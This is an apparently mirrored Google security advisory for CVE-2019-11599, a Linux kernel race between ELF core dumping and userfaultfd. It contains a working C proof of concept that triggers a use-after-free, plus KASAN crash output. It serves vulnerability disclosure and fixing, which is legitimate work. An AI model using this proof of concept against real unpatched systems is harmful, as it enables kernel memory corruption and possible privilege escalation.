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Linux Missing Lockdown

Linux Missing Lockdown
Posted Apr 29, 2019
Authored by Jann Horn, Google Security Research

Linux suffers from a missing locking between ELF coredump code and userfaultfd VMA modification.

tags | exploit
systems | linux
advisories | CVE-2019-11599
SHA-256 | 673a7d5b5c8c34c1c31d9a3eff1b04dbcf78b701cc9cca3e53ef0c155170313f

Linux Missing Lockdown

Change Mirror Download
Linux: missing locking between ELF coredump code and userfaultfd VMA modification 

Related CVE Numbers: CVE-2019-11599.


elf_core_dump() has a comment back from something like 2.5.43-C3 that says:

/*
* We no longer stop all VM operations.
*
* This is because those proceses that could possibly change map_count
* or the mmap / vma pages are now blocked in do_exit on current
* finishing this core dump.
*
* Only ptrace can touch these memory addresses, but it doesn't change
* the map_count or the pages allocated. So no possibility of crashing
* exists while dumping the mm->vm_next areas to the core file.
*/

However, since commit 86039bd3b4e6 (\"userfaultfd: add new syscall to provide
memory externalization\", introduced in v4.3), that's no longer true; the
following functions can call vma_merge() on another task's VMAs while holding
the corresponding mmap_sem for writing:

- userfaultfd_release() [->release handler]
- userfaultfd_register() [invoked via ->unlocked_ioctl handler]
- userfaultfd_unregister() [invoked via ->unlocked_ioctl handler]

This means that VMAs can disappear from under elf_core_dump().


I see two potential ways to fix this, but I'm not sure whether either of them is
good:

1. Let elf_core_dump() hold a read lock on the mmap_sem across the page-dumping
loop. This would mean that the mmap_sem can be blocked indefinitely by a
userspace process, and e.g. userfaultfd_release() could block the task or
global workqueue it's running on (depending on where the final fput()
happened) indefinitely, which seems potentially bad from a denial-of-service
perspective?
2. Let coredump_wait() set a flag on the mm_struct before dropping the mmap_sem
that says \"this mm_struct is going away, keep your hands off\";
let the userfaultfd ioctl handlers check for the flag and bail out as if the
mm_struct was already dead;
hack userfaultfd_release() so that it only calls vma_merge() if the flag
hasn't been set;
and because I feel icky about concurrent reads and writes of bitmasks without
explicit annotations, either make the vm_flags accesses in
userfaultfd_release() and in everything called from elf_core_dump() atomic
(because userfaultfd_release will clear bits in them concurrently with reads
from elf_core_dump()) or let elf_core_dump() take the mmap_sem for reading
while looking at vm_flags.
If the fix goes in this direction, it should probably come with a big warning
on top of the definition of mmap_sem, or something like that.


Here's a simple proof-of-concept:
======================================================================
user@debian:~/uffd_coredump$ cat coredump_helper.c
#include <unistd.h>
#include <stdlib.h>
#include <err.h>
#include <stdbool.h>

int main(void) {
char buf[1024];
size_t total = 0;
bool slept = false;
while (1) {
int res = read(0, buf, sizeof(buf));
if (res == -1) err(1, \"read\");
if (res == 0) return 0;
total += res;
if (total > 1024*1024 && !slept) {
sleep(10);
slept = true;
}
}
}
user@debian:~/uffd_coredump$ gcc -o coredump_helper coredump_helper.c
user@debian:~/uffd_coredump$ cat set_helper.sh
#!/bin/sh
echo \"|$(realpath ./coredump_helper)\" > /proc/sys/kernel/core_pattern
user@debian:~/uffd_coredump$ sudo ./set_helper.sh
user@debian:~/uffd_coredump$ cat dumpme.c
#define _GNU_SOURCE
#include <string.h>
#include <stdlib.h>
#include <linux/userfaultfd.h>
#include <sys/ioctl.h>
#include <sys/syscall.h>
#include <err.h>
#include <unistd.h>
#include <sys/mman.h>

int main(void) {
// set up an area consisting of half normal anon memory, half present userfaultfd region
void *area = mmap(NULL, 1024*1024*2, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);
if (area == MAP_FAILED) err(1, \"mmap\");
memset(area, 'A', 1024*1024*2);
int uffd = syscall(__NR_userfaultfd, 0);
if (uffd == -1) err(1, \"userfaultfd\");
struct uffdio_api api = { .api = 0xAA, .features = 0 };
if (ioctl(uffd, UFFDIO_API, &api)) err(1, \"API\");
struct uffdio_register reg = {
.range = { .start = (unsigned long)area+1024*1024, .len = 1024*1024 },
.mode = UFFDIO_REGISTER_MODE_MISSING
};
if (ioctl(uffd, UFFDIO_REGISTER, &reg)) err(1, \"REGISTER\");

// spawn a child that can do stuff with the userfaultfd
pid_t child = fork();
if (child == -1) err(1, \"fork\");
if (child == 0) {
sleep(3);
if (ioctl(uffd, UFFDIO_UNREGISTER, &reg.range)) err(1, \"UNREGISTER\");
exit(0);
}

*(volatile char *)0 = 42;
}
user@debian:~/uffd_coredump$ gcc -o dumpme dumpme.c
user@debian:~/uffd_coredump$ ./dumpme
Segmentation fault (core dumped)
user@debian:~/uffd_coredump$
======================================================================

dmesg output:
======================================================================
[ 128.977354] dumpme[1116]: segfault at 0 ip 0000563e14789a6e sp 00007ffed407cd80 error 6 in dumpme[563e14789000+1000]
[ 128.979600] Code: ff 85 c0 74 16 48 8d 35 d7 00 00 00 bf 01 00 00 00 b8 00 00 00 00 e8 c1 fc ff ff bf 00 00 00 00 e8 c7 fc ff ff b8 00 00 00 00 <c6> 00 2a b8 00 00 00 00 c9 c3 0f 1f 84 00 00 00 00 00 41 57 41 56
[ 138.988465] ==================================================================
[ 138.992696] BUG: KASAN: use-after-free in elf_core_dump+0x2063/0x20e0
[ 138.994168] Read of size 8 at addr ffff8881e616ed60 by task dumpme/1116

[ 138.996163] CPU: 1 PID: 1116 Comm: dumpme Not tainted 5.0.0-rc8 #292
[ 138.997591] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.10.2-1 04/01/2014
[ 138.999570] Call Trace:
[ 139.000237] dump_stack+0x71/0xab
[...]
[ 139.001940] print_address_description+0x6a/0x2b0
[...]
[ 139.005026] kasan_report+0x14e/0x192
[...]
[ 139.006803] elf_core_dump+0x2063/0x20e0
[...]
[ 139.013876] do_coredump+0x1072/0x17a0
[...]
[ 139.027534] get_signal+0x93c/0xa90
[ 139.028400] do_signal+0x85/0xb20
[...]
[ 139.034068] exit_to_usermode_loop+0xfb/0x120
[...]
[ 139.036028] prepare_exit_to_usermode+0x95/0xb0
[ 139.037114] retint_user+0x8/0x8
[ 139.037884] RIP: 0033:0x563e14789a6e
[ 139.038661] Code: ff 85 c0 74 16 48 8d 35 d7 00 00 00 bf 01 00 00 00 b8 00 00 00 00 e8 c1 fc ff ff bf 00 00 00 00 e8 c7 fc ff ff b8 00 00 00 00 <c6> 00 2a b8 00 00 00 00 c9 c3 0f 1f 84 00 00 00 00 00 41 57 41 56
[ 139.042892] RSP: 002b:00007ffed407cd80 EFLAGS: 00010202
[ 139.044148] RAX: 0000000000000000 RBX: 0000000000000000 RCX: 00007f654198538b
[ 139.045809] RDX: 0000000000000000 RSI: 0000000000000000 RDI: 0000000001200011
[ 139.047405] RBP: 00007ffed407cdd0 R08: 00007f6541e6f700 R09: 00007ffed407cdae
[ 139.049063] R10: 00007f6541e6f9d0 R11: 0000000000000246 R12: 0000563e14789770
[ 139.050659] R13: 00007ffed407ceb0 R14: 0000000000000000 R15: 0000000000000000

[ 139.052673] Allocated by task 1116:
[ 139.053506] __kasan_kmalloc.constprop.9+0xa0/0xd0
[ 139.054600] kmem_cache_alloc+0xd6/0x1e0
[ 139.055561] vm_area_alloc+0x1b/0x80
[ 139.056339] mmap_region+0x4db/0xa60
[ 139.057179] do_mmap+0x44d/0x6f0
[ 139.057953] vm_mmap_pgoff+0x163/0x1b0
[ 139.058936] ksys_mmap_pgoff+0x16a/0x330
[ 139.059839] do_syscall_64+0x73/0x160
[ 139.060633] entry_SYSCALL_64_after_hwframe+0x44/0xa9

[ 139.062270] Freed by task 1117:
[ 139.062957] __kasan_slab_free+0x130/0x180
[ 139.063906] kmem_cache_free+0x73/0x1c0
[ 139.064829] __vma_adjust+0x564/0xca0
[ 139.065756] vma_merge+0x358/0x6a0
[ 139.066504] userfaultfd_ioctl+0x687/0x17c0
[ 139.067533] do_vfs_ioctl+0x134/0x8f0
[ 139.068377] ksys_ioctl+0x70/0x80
[ 139.069141] __x64_sys_ioctl+0x3d/0x50
[ 139.069959] do_syscall_64+0x73/0x160
[ 139.070755] entry_SYSCALL_64_after_hwframe+0x44/0xa9

[ 139.072235] The buggy address belongs to the object at ffff8881e616ed50
which belongs to the cache vm_area_struct of size 200
[ 139.075075] The buggy address is located 16 bytes inside of
200-byte region [ffff8881e616ed50, ffff8881e616ee18)
[ 139.077556] The buggy address belongs to the page:
[ 139.078648] page:ffffea0007985b00 count:1 mapcount:0 mapping:ffff8881eada6f00 index:0x0 compound_mapcount: 0
[ 139.080745] flags: 0x17fffc000010200(slab|head)
[ 139.081724] raw: 017fffc000010200 ffffea000792dc08 ffffea0007765c08 ffff8881eada6f00
[ 139.083477] raw: 0000000000000000 00000000001d001d 00000001ffffffff 0000000000000000
[ 139.085121] page dumped because: kasan: bad access detected

[ 139.086667] Memory state around the buggy address:
[ 139.087695] ffff8881e616ec00: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
[ 139.089294] ffff8881e616ec80: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
[ 139.090833] >ffff8881e616ed00: fc fc fc fc fc fc fc fc fc fc fb fb fb fb fb fb
[ 139.092417] ^
[ 139.093780] ffff8881e616ed80: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
[ 139.095318] ffff8881e616ee00: fb fb fb fc fc fc fc fc fc fc fc fc fc fc fc fc
[ 139.096917] ==================================================================
[ 139.098460] Disabling lock debugging due to kernel taint
======================================================================


This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available (whichever is earlier), the bug
report will become visible to the public.


Found by: jannh@google.com

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